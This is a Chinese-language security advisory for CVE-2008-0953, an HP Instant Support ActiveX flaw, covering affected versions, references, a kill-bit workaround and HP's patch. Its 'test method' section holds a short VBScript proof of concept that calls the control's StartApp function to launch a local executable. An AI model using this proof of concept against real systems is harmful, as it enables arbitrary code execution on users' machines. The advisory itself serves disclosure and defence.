发布日期：2008-06-03
更新日期：2008-06-05

受影响系统：

HP Instant Support 1.0.0.22

不受影响系统：

HP Instant Support 1.0.0.24

描述：

---

BUGTRAQ  ID: 29533
CVE(CAN) ID: CVE-2008-0953

HP Instant Support是是基于网络的故障诊断和排除工具套件，适用于桌面计算和打印产品。

HP Instant Support所安装的HPISDataManager.dll ActiveX控件没有正确地过滤对StartApp函数的输入参数。如果用户受骗访问了恶意网页并向该函数传送了超长参数的话，就可能导致执行本地系统上的任意文件。

<*来源：Dennis Rand （DER@cowi.dk）
  
  链接：http://secunia.com/advisories/30516/
        http://www.csis.dk/dk/forside/CSIS-RI-0003.pdf
        http://marc.info/?l=bugtraq&m=121259280006874&w=2
        http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01422264
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<?XML version='1.0' standalone='yes' ?>
<package><job id='DoneInVBS' debug='false' error='true'>
<object classid='clsid:14C1B87C-3342-445F-9B5E-365FF330A3AC' id='target' />
<script language='vbscript'>
'for debugging/custom prolog
targetFile = "C:\WINDOWS\Downloaded Program Files\HPISDataManager.dll"
prototype = "Function StartApp ( ByVal appName As String ) As String"
memberName = "StartApp"
progid = "HPISDataManagerLib.Datamgr"
argCount = 1
arg1="c:\evilfile.exe"
target.StartApp arg1
</script></job></package>

建议：

---

临时解决方法：

* 为clsid：14C1B87C-3342-445F-9B5E-365FF330A3AC设置kill-bit。

厂商补丁：

HP
--
HP已经为此发布了一个安全公告（HPSBMA02326）以及相应补丁:
HPSBMA02326：SSRT071490 rev.1 - HP Instant Support HPISDataManager.dll Running on Windows, Remote Execution of Arbitrary Code
链接：http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01422264

浏览次数：2655
严重程度：0（网友投票）